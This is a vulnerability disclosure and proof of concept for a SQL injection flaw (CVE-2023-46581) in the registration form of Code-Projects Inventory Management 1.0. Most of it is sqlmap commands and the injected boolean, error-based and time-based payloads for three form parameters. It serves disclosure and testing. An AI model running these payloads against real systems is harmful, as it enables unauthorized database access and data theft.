CVE-2023-46581-Code-Projects-Inventory-Management-1.0-SQL-Injection-Vulnerability
Exploit Author: ersinerenler
Code-Projects Inventory Management V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'name', 'uname' and 'email' parameters in the registration.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.
CVE ID: CVE-2023-46581
Affected Version: Code-Projects Inventory Management V1.0
Vulnerable File: /registration.php
Parameter Names: name, uname, email
The lack of proper input validation and sanitization on the 'name', 'uname', 'email' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database
Go to the registration page --> http://localhost/Inventory-Management/view/registration.php
Fill the form and click 'Submit' button
Intercept the request via Burp Suite
Copy and paste the request to a request.txt file
Then use sqlmap to exploit
sqlmap -r request.txt -p name --risk 3 --level 5 --dbms mysql --batch --current-db
---
Parameter: MULTIPART name ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: -----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="name"
test'||(SELECT 0x786e556a WHERE 8460=8460 AND 6306=6306)||'
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="uname"
testersin
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="email"
test@test.com
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="password"
Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="rpassword"
Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="submit"
Submit
-----------------------------358741317412787265312048716550--
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: -----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="name"
test'||(SELECT 0x42474e51 WHERE 2291=2291 AND (SELECT 9160 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(9160=9160,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="uname"
testersin
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="email"
test@test.com
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="password"
Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="rpassword"
Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="submit"
Submit
-----------------------------358741317412787265312048716550--
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="name"
test'||(SELECT 0x7a477657 WHERE 4458=4458 AND (SELECT 2615 FROM (SELECT(SLEEP(5)))fPSA))||'
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="uname"
testersin
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="email"
test@test.com
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="password"
Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="rpassword"
Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="submit"
Submit
-----------------------------358741317412787265312048716550--
---
sqlmap -r request.txt -p uname --risk 3 --level 5 --dbms mysql --batch --current-db
---
Parameter: MULTIPART uname ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: -----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="name"
test
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="uname"
testersin'||(SELECT 0x76794d63 WHERE 8027=8027 AND 6162=6162)||'
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="email"
test@test.com
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="password"
Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="rpassword"
Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="submit"
Submit
-----------------------------358741317412787265312048716550--
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: -----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="name"
test
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="uname"
testersin'||(SELECT 0x79515248 WHERE 2650=2650 AND (SELECT 1470 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(1470=1470,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="email"
test@test.com
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="password"
Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="rpassword"
Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="submit"
Submit
-----------------------------358741317412787265312048716550--
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="name"
test
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="uname"
testersin'||(SELECT 0x4d59474e WHERE 7393=7393 AND (SELECT 3657 FROM (SELECT(SLEEP(5)))vDUR))||'
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="email"
test@test.com
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="password"
Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="rpassword"
Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="submit"
Submit
-----------------------------358741317412787265312048716550--
---
sqlmap -r request.txt -p email --risk 3 --level 5 --dbms mysql --batch --current-db
---
Parameter: MULTIPART email ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: -----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="name"
test
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="uname"
testersin
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="email"
test@test.com' RLIKE (SELECT (CASE WHEN (6850=6850) THEN 0x74657374657273696e3840676d61696c2e636f6d ELSE 0x28 END)) AND 'Jpfy'='Jpfy
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="password"
Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="rpassword"
Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="submit"
Submit
-----------------------------358741317412787265312048716550--
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: -----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="name"
test
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="uname"
testersin
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="email"
test@test.com' OR (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(9832=9832,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZTBd'='ZTBd
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="password"
Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="rpassword"
Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="submit"
Submit
-----------------------------358741317412787265312048716550--
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="name"
test
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="uname"
testersin
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="email"
test@test.com' AND (SELECT 7637 FROM (SELECT(SLEEP(5)))yslj) AND 'HvYI'='HvYI
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="password"
Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="rpassword"
Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="submit"
Submit
-----------------------------358741317412787265312048716550--
---
current database: inventory_project
